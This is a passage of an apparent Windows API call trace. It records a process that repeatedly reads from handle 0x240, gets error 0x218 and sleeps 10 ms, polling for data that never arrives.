	[0230.928] Sleep (dwMilliseconds=0xa) 
	[0230.956] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.956] GetLastError () returned 0x218
	[0230.956] Sleep (dwMilliseconds=0xa) 
	[0230.960] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.960] GetLastError () returned 0x218
	[0230.960] Sleep (dwMilliseconds=0xa) 
	[0230.974] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.975] GetLastError () returned 0x218
	[0230.975] Sleep (dwMilliseconds=0xa) 
	[0230.990] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.990] GetLastError () returned 0x218
	[0230.990] Sleep (dwMilliseconds=0xa) 
	[0231.037] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.037] GetLastError () returned 0x218
	[0231.037] Sleep (dwMilliseconds=0xa) 
	[0231.084] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.084] GetLastError () returned 0x218
	[0231.084] Sleep (dwMilliseconds=0xa) 
	[0231.161] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.161] GetLastError () returned 0x218
	[0231.162] Sleep (dwMilliseconds=0xa) 
	[0231.220] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.220] GetLastError () returned 0x218
	[0231.220] Sleep (dwMilliseconds=0xa) 
	[0231.224] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.224] GetLastError () returned 0x218
	[0231.224] Sleep (dwMilliseconds=0xa) 
	[0231.239] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.239] GetLastError () returned 0x218
	[0231.240] Sleep (dwMilliseconds=0xa) 
	[0231.255] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.255] GetLastError () returned 0x218
	[0231.256] Sleep (dwMilliseconds=0xa) 
	[0231.271] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.271] GetLastError () returned 0x218
	[0231.271] Sleep (dwMilliseconds=0xa) 
	[0231.286] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.287] GetLastError () returned 0x218
	[0231.287] Sleep (dwMilliseconds=0xa) 
	[0231.302] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.302] GetLastError () returned 0x218
	[0231.302] Sleep (dwMilliseconds=0xa) 
	[0231.318] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.319] GetLastError () returned 0x218
	[0231.319] Sleep (dwMilliseconds=0xa) 
	[0231.352] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.352] GetLastError () returned 0x218
	[0231.353] Sleep (dwMilliseconds=0xa) 
	[0231.396] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.396] GetLastError () returned 0x218
	[0231.396] Sleep (dwMilliseconds=0xa) 
	[0231.458] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.458] GetLastError () returned 0x218
	[0231.458] Sleep (dwMilliseconds=0xa) 
	[0231.489] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.489] GetLastError () returned 0x218
	[0231.489] Sleep (dwMilliseconds=0xa) 
	[0231.505] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.505] GetLastError () returned 0x218
	[0231.505] Sleep (dwMilliseconds=0xa) 
	[0231.521] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.522] GetLastError () returned 0x218
	[0231.522] Sleep (dwMilliseconds=0xa) 
	[0231.536] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.536] GetLastError () returned 0x218
	[0231.536] Sleep (dwMilliseconds=0xa) 
	[0231.552] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.552] GetLastError () returned 0x218
	[0231.552] Sleep (dwMilliseconds=0xa) 
	[0231.567] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.567] GetLastError () returned 0x218
	[0231.567] Sleep (dwMilliseconds=0xa) 
	[0231.583] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.583] GetLastError () returned 0x218
	[0231.583] Sleep (dwMilliseconds=0xa) 
	[0231.630] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.630] GetLastError () returned 0x218
	[0231.630] Sleep (dwMilliseconds=0xa) 
	[0231.676] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.676] GetLastError () returned 0x218
	[0231.676] Sleep (dwMilliseconds=0xa) 
	[0231.722] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.723] GetLastError () returned 0x218
	[0231.723] Sleep (dwMilliseconds=0xa) 
	[0231.723] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.723] GetLastError () returned 0x218
	[0231.723] Sleep (dwMilliseconds=0xa) 
	[0231.739] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.739] GetLastError () returned 0x218
	[0231.739] Sleep (dwMilliseconds=0xa) 
	[0231.766] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.774] GetLastError () returned 0x218
	[0231.774] Sleep (dwMilliseconds=0xa) 
	[0231.786] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.786] GetLastError () returned 0x218
	[0231.786] Sleep (dwMilliseconds=0xa) 
	[0231.801] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.801] GetLastError () returned 0x218
	[0231.801] Sleep (dwMilliseconds=0xa) 
	[0231.821] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.821] GetLastError () returned 0x218
	[0231.821] Sleep (dwMilliseconds=0xa) 
	[0231.863] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.863] GetLastError () returned 0x218
	[0231.863] Sleep (dwMilliseconds=0xa) 
	[0231.935] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.935] GetLastError () returned 0x218
	[0231.935] Sleep (dwMilliseconds=0xa) 
	[0231.984] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.984] GetLastError () returned 0x218
	[0231.984] Sleep (dwMilliseconds=0xa) 
	[0231.989] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0231.989] GetLastError () returned 0x218
	[0231.989] Sleep (dwMilliseconds=0xa) 
	[0232.004] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.004] GetLastError () returned 0x218
	[0232.004] Sleep (dwMilliseconds=0xa) 
	[0232.020] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.020] GetLastError () returned 0x218
	[0232.020] Sleep (dwMilliseconds=0xa) 
	[0232.040] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.040] GetLastError () returned 0x218
	[0232.040] Sleep (dwMilliseconds=0xa) 
	[0232.053] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.053] GetLastError () returned 0x218
	[0232.053] Sleep (dwMilliseconds=0xa) 
	[0232.066] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.066] GetLastError () returned 0x218
	[0232.066] Sleep (dwMilliseconds=0xa) 
	[0232.082] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.082] GetLastError () returned 0x218
	[0232.083] Sleep (dwMilliseconds=0xa) 
	[0232.175] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.175] GetLastError () returned 0x218
	[0232.176] Sleep (dwMilliseconds=0xa) 
	[0232.255] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.255] GetLastError () returned 0x218
	[0232.255] Sleep (dwMilliseconds=0xa) 
	[0232.300] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.300] GetLastError () returned 0x218
	[0232.300] Sleep (dwMilliseconds=0xa) 
	[0232.316] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.316] GetLastError () returned 0x218
	[0232.316] Sleep (dwMilliseconds=0xa) 
	[0232.332] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.332] GetLastError () returned 0x218
	[0232.332] Sleep (dwMilliseconds=0xa) 
	[0232.348] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.348] GetLastError () returned 0x218
	[0232.348] Sleep (dwMilliseconds=0xa) 
	[0232.363] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.364] GetLastError () returned 0x218
	[0232.364] Sleep (dwMilliseconds=0xa) 
	[0232.379] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.379] GetLastError () returned 0x218
	[0232.380] Sleep (dwMilliseconds=0xa) 
	[0232.395] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.395] GetLastError () returned 0x218
	[0232.395] Sleep (dwMilliseconds=0xa) 
	[0232.412] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.412] GetLastError () returned 0x218
	[0232.412] Sleep (dwMilliseconds=0xa) 
	[0232.457] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.457] GetLastError () returned 0x218
	[0232.457] Sleep (dwMilliseconds=0xa) 
	[0232.503] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.503] GetLastError () returned 0x218
	[0232.503] Sleep (dwMilliseconds=0xa) 
	[0232.546] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.546] GetLastError () returned 0x218
	[0232.546] Sleep (dwMilliseconds=0xa) 
	[0232.552] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.552] GetLastError () returned 0x218
	[0232.553] Sleep (dwMilliseconds=0xa) 
	[0232.566] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.566] GetLastError () returned 0x218
	[0232.566] Sleep (dwMilliseconds=0xa) 
	[0232.582] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.582] GetLastError () returned 0x218
	[0232.582] Sleep (dwMilliseconds=0xa) 
	[0232.597] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.597] GetLastError () returned 0x218
	[0232.597] Sleep (dwMilliseconds=0xa) 
	[0232.613] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.613] GetLastError () returned 0x218
	[0232.613] Sleep (dwMilliseconds=0xa) 
	[0232.628] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.628] GetLastError () returned 0x218
	[0232.629] Sleep (dwMilliseconds=0xa) 
	[0232.644] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.644] GetLastError () returned 0x218
	[0232.644] Sleep (dwMilliseconds=0xa) 
	[0232.721] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.721] GetLastError () returned 0x218
	[0232.721] Sleep (dwMilliseconds=0xa) 
	[0232.784] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.784] GetLastError () returned 0x218
	[0232.784] Sleep (dwMilliseconds=0xa) 
	[0232.831] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.831] GetLastError () returned 0x218
	[0232.831] Sleep (dwMilliseconds=0xa) 
	[0232.847] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.847] GetLastError () returned 0x218
	[0232.847] Sleep (dwMilliseconds=0xa) 
	[0232.862] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.862] GetLastError () returned 0x218
	[0232.862] Sleep (dwMilliseconds=0xa) 
	[0232.878] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.878] GetLastError () returned 0x218
	[0232.878] Sleep (dwMilliseconds=0xa) 
	[0232.894] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.894] GetLastError () returned 0x218
	[0232.894] Sleep (dwMilliseconds=0xa) 
	[0232.910] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.910] GetLastError () returned 0x218
	[0232.910] Sleep (dwMilliseconds=0xa) 
	[0232.928] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.928] GetLastError () returned 0x218
	[0232.928] Sleep (dwMilliseconds=0xa) 
	[0232.957] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0232.957] GetLastError () returned 0x218
	[0232.957] Sleep (dwMilliseconds=0xa) 
	[0233.002] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.002] GetLastError () returned 0x218
	[0233.003] Sleep (dwMilliseconds=0xa) 
	[0233.049] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.049] GetLastError () returned 0x218
	[0233.049] Sleep (dwMilliseconds=0xa) 
	[0233.086] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.086] GetLastError () returned 0x218
	[0233.086] Sleep (dwMilliseconds=0xa) 
	[0233.097] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.097] GetLastError () returned 0x218
	[0233.097] Sleep (dwMilliseconds=0xa) 
	[0233.112] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.113] GetLastError () returned 0x218
	[0233.113] Sleep (dwMilliseconds=0xa) 
